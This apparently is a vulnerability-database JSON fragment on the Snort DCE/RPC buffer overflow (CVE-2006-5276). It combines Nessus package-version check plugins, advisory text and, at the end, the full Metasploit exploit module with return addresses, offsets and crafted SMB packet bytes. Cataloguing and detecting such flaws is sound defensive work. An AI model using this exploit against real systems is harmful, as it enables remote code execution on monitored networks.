script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"snort-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-bloat-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-debuginfo-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-mysql-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-mysql+flexresp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-plain+flexresp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-postgresql-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-postgresql+flexresp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-snmp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-snmp+flexresp-2.7.0.1-3.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"snort / snort-bloat / snort-debuginfo / snort-mysql / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:49:08", "description": "A IBM Internet Security Systems Protection Advisory reports :\n\nSnort is vulnerable to a stack-based buffer overflow as a result of\nDCE/RPC reassembly. This vulnerability is in a dynamic-preprocessor\nenabled in the default configuration, and the configuration for this\npreprocessor allows for auto-recognition of SMB traffic to perform\nreassembly on. No checks are performed to see if the traffic is part\nof a valid TCP session, and multiple Write AndX requests can be\nchained in the same TCP segment. As a result, an attacker can exploit\nthis overflow with a single TCP PDU sent across a network monitored by\nSnort or Sourcefire.\n\nSnort users who cannot upgrade immediately are advised to disable the\nDCE/RPC preprocessor by removing the DCE/RPC preprocessor directives\nfrom snort.conf and restarting Snort. However, be advised that\ndisabling the DCE/RPC preprocessor reduces detection capabilities for\nattacks in DCE/RPC traffic. After upgrading, customers should\nre-enable the DCE/RPC preprocessor.", "edition": 25, "published": "2007-02-22T00:00:00", "title": "FreeBSD : snort -- DCE/RPC preprocessor vulnerability (afdf500f-c1f6-11db-95c5-000c6ec775d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "modified": "2007-02-22T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:snort"], "id": "FREEBSD_PKG_AFDF500FC1F611DB95C5000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/nessus/24686", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24686);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-5276\");\n script_xref(name:\"CERT\", value:\"196240\");\n\n script_name(english:\"FreeBSD : snort -- DCE/RPC preprocessor vulnerability (afdf500f-c1f6-11db-95c5-000c6ec775d9)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A IBM Internet Security Systems Protection Advisory reports :\n\nSnort is vulnerable to a stack-based buffer overflow as a result of\nDCE/RPC reassembly. This vulnerability is in a dynamic-preprocessor\nenabled in the default configuration, and the configuration for this\npreprocessor allows for auto-recognition of SMB traffic to perform\nreassembly on. No checks are performed to see if the traffic is part\nof a valid TCP session, and multiple Write AndX requests can be\nchained in the same TCP segment. As a result, an attacker can exploit\nthis overflow with a single TCP PDU sent across a network monitored by\nSnort or Sourcefire.\n\nSnort users who cannot upgrade immediately are advised to disable the\nDCE/RPC preprocessor by removing the DCE/RPC preprocessor directives\nfrom snort.conf and restarting Snort. However, be advised that\ndisabling the DCE/RPC preprocessor reduces detection capabilities for\nattacks in DCE/RPC traffic. After upgrading, customers should\nre-enable the DCE/RPC preprocessor.\"\n );\n # http://xforce.iss.net/xforce/xfdb/31275\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cddab8bb\"\n );\n # http://www.snort.org/docs/advisory-2007-02-19.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24d71b61\"\n );\n # https://vuxml.freebsd.org/freebsd/afdf500f-c1f6-11db-95c5-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90a93074\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Snort 2 DCE/RPC Preprocessor Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:snort\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"snort>=2.6.1<2.6.1.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:11", "description": "The remote host is affected by the vulnerability described in GLSA-200703-01\n(Snort: Remote execution of arbitrary code)\n\n The Snort DCE/RPC preprocessor does not properly reassemble certain\n types of fragmented SMB and DCE/RPC packets.\n \nImpact :\n\n A remote attacker could send specially crafted fragmented SMB or\n DCE/RPC packets, without the need to finish the TCP handshake, that\n would trigger a stack-based buffer overflow while being reassembled.\n This could lead to the execution of arbitrary code with the permissions\n of the user running the Snort preprocessor.\n \nWorkaround :\n\n Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc'\n section in /etc/snort/snort.conf .", "edition": 25, "published": "2007-03-02T00:00:00", "title": "GLSA-200703-01 : Snort: Remote execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:snort"], "id": "GENTOO_GLSA-200703-01.NASL", "href": "https://www.tenable.com/plugins/nessus/24749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200703-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24749);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-5276\");\n script_xref(name:\"GLSA\", value:\"200703-01\");\n\n script_name(english:\"GLSA-200703-01 : Snort: Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200703-01\n(Snort: Remote execution of arbitrary code)\n\n The Snort DCE/RPC preprocessor does not properly reassemble certain\n types of fragmented SMB and DCE/RPC packets.\n \nImpact :\n\n A remote attacker could send specially crafted fragmented SMB or\n DCE/RPC packets, without the need to finish the TCP handshake, that\n would trigger a stack-based buffer overflow while being reassembled.\n This could lead to the execution of arbitrary code with the permissions\n of the user running the Snort preprocessor.\n \nWorkaround :\n\n Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc'\n section in /etc/snort/snort.conf .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200703-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Snort users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/snort-2.6.1.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Snort 2 DCE/RPC Preprocessor Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:snort\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/snort\", unaffected:make_list(\"ge 2.6.1.3\"), vulnerable:make_list(\"lt 2.6.1.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Snort\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-19T23:16:48", "description": "This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.\n", "published": "2012-06-05T11:14:40", "type": "metasploit", "title": "Snort 2 DCE/RPC Preprocessor Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/IDS/SNORT_DCE_RPC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Capture\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',\n 'Description' => %q{\n This module allows remote attackers to execute arbitrary code by exploiting the\n Snort service via crafted SMB traffic. The vulnerability is due to a boundary\n error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,\n which may result a stack-based buffer overflow with a specially crafted packet\n sent on a network that is monitored by Snort.\n\n Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.\n\n Any host on the Snort network may be used as the remote host. The remote host does not\n need to be running the SMB service for the exploit to be successful.\n },\n 'Author' =>\n [\n 'Neel Mehta', #Original discovery (IBM X-Force)\n 'Trirat Puttaraksa', #POC\n 'Carsten Maartmann-Moe <carsten[at]carmaa.com>', #Metasploit win\n '0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '32094' ],\n [ 'CVE', '2006-5276' ],\n [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],\n [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],\n [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 390,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true,\n },\n 'Platform' => %w{ win linux },\n 'Targets' =>\n [\n [\n 'Windows Universal',\n {\n 'Platform' => 'win',\n 'Ret' => 0x00407c01, # JMP ESP snort.exe\n 'Offset' => 289, # The number of bytes before overwrite\n 'Padding' => 0\n }\n ],\n [\n 'Redhat 8',\n {\n 'Platform' => 'linux',\n 'Ret' => 0xbffff110,\n 'Offset' => 317,\n 'Padding' => 28\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Feb 19 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(139),\n OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),\n OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])\n ])\n\n deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')\n end\n\n def exploit\n open_pcap\n\n shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)\n\n p = buildpacket(shost, rhost, rport.to_i)\n\n print_status(\"#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...\")\n\n return unless capture_sendto(p, rhost)\n\n handler\n end\n\n def buildpacket(shost, rhost, rport)\n p = PacketFu::TCPPacket.new\n p.ip_saddr = shost\n p.ip_daddr = rhost\n p.tcp_dport = rport\n p.tcp_flags.psh = 1\n p.tcp_flags.ack = 1\n\n # SMB packet borrowed from https://www.exploit-db.com/exploits/3362\n\n # NetBIOS Session Service, value is the number of bytes in the TCP segment,\n # must be greater than the total size of the payload. Statically set.\n header = \"\\x00\\x00\\xde\\xad\"\n\n # SMB Header\n header << \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\n header << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\n header << \"\\x00\\x08\\x30\\x00\"\n\n # Tree Connect AndX Request\n header << \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\n header << \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\n header << \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\n header << \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n # NT Create AndX Request\n header << \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n header << \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n header << \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\n header << \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\n header << \"\\x63\\x00\\x00\\x00\"\n\n # Write AndX Request #1\n header << \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n header << \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n header << \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\n header << \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\n header << \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\n header << \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\n header << \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n # Write AndX Request #2\n header << \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n header << \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\"\n tail = \"\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\n # Return address\n eip = [target['Ret']].pack('V')\n\n # Sploit\n sploit = make_nops(10)\n sploit << payload.encoded\n\n # Padding (to pass size check)\n sploit << make_nops(1)\n\n # The size to be included in Write AndX Request #2, including sploit payload\n requestsize = [(sploit.size() + target['Offset'])].pack('v')\n\n # Assemble the parts into one package\n p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit\n\n p.recalc\n\n p\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ids/snort_dce_rpc.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
